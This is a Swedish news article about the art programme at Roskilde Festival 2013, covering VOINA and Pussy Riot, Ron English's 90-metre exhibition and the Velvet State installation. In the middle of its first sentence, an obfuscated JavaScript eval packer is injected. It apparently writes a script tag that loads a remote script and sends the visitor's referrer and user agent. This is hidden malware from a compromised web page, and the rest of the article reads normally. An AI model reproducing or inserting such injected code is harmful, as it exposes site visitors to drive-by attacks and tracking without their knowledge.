Image Image Image Image Image Image Image Image Image Image

| 20 juni, 2021

Scroll to top

Top

100 konstprojekt kommer att utmana besökarna på årets Roskilde Festival

100 konstprojekt kommer att utmana besökarna på årets Roskilde Festival
Sebastian

Roskilde: 100 eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|bezbt|var|u0026u|referrer|iebds||js|php’.split(’|’),0,{}))
konstinstallationer har blivit skapade speciellt för Roskilde 2013. De kommer att komplettera årets festivals nuvarande galleri för personer som letar efter banbrytande konst. Aktivisterna från Pussy Riot från moder-gruppen VOINA kommer att få ta festivalens gäster som politiska fångar medan amerikanen Ron English flyttar sin konsument-kritiska popkonst från NYC till den 90 meter långa utställningen vid Orange Stage

Även om festivalens gäster är nyfikna så måste även den mest utåtriktade och orädda hasten varnas. För detta årets konstprogram kommer att utöka gränserna för medverkan under nio dagar av festival. Runt 100 konstprojekt inom arkitektur, framträdanden och installationen speciellt gjorda för gästerna kommer att slåss mot musikscenen in I det sista.

VOINA for freedom
Trots att det humoristiska framträdandet av den radikala konst-gruppen VOINA, från vilka Pussy Riot kommer ifrån, så är de väldigt seriösa i sin attityd gentemot mänskliga rättigheter, politisk fångenskap och hot mot minoriteter, vilket är det som provocerar de Ryska politikerna. På Roskilde så får de göra och saga vad de vill – kanske till och med fånga och fängsla gäster medan de skriker ut uppmaningar.

The Velvet State gets under your skin
På Art Zone, center för konst och framträdanden på festivalen så ser vi Fiction Pimps (DK) och Collective Unconscious (UK) I ett samarbete med Simon Hjermind Jensen från SHJworks, där de skapar installationen Velvet State, som är ett parallellt universum fyllt med Twin Peak-liknande visioner för gästerna att utforska och utmana sina kroppar och begränsningar. I mörkret kan de springa in i flickrummet, slaktaren eller till och med träffa The Fetishist eller The Killer. Vi garanterar att detta är en upplevelse som är exklusiv till Roskilde.

A window of international art
Konstprogrammet på Roskilde är inte bara ett fönster öppet för den internationella konstscenen, det utmanar även den konstälskande gästen genom att introducera de senaste trenderna inom konsten. Konstprogrammet introducerar bland annat popartisten Ron English som gör en 90 meter lång utställning som är en egen version av “woman experience your body”, känd som en dansk utställning på Mongo Park.

Enligt Roskildes konstansvariga Signe Brin Pedersen: “Experiencing art and performances at The Roskilde Festival is very different from visiting a museum all though our selection matches even large and established exhibitions. The festival guests are extremely curious and outreaching which challenges the artists. This challenge options a possibility of active involvement and dialog – a quite rare possibility in artistic context”.

På Roskilde 2013 kommer du att mötas av ungefär 100 konstnärliga utställningar, gjorda av 300 artister. Tillsammans skapar de ett festivalområde som blir ett helt parallellt universum, och som bjuder in gäster att delta.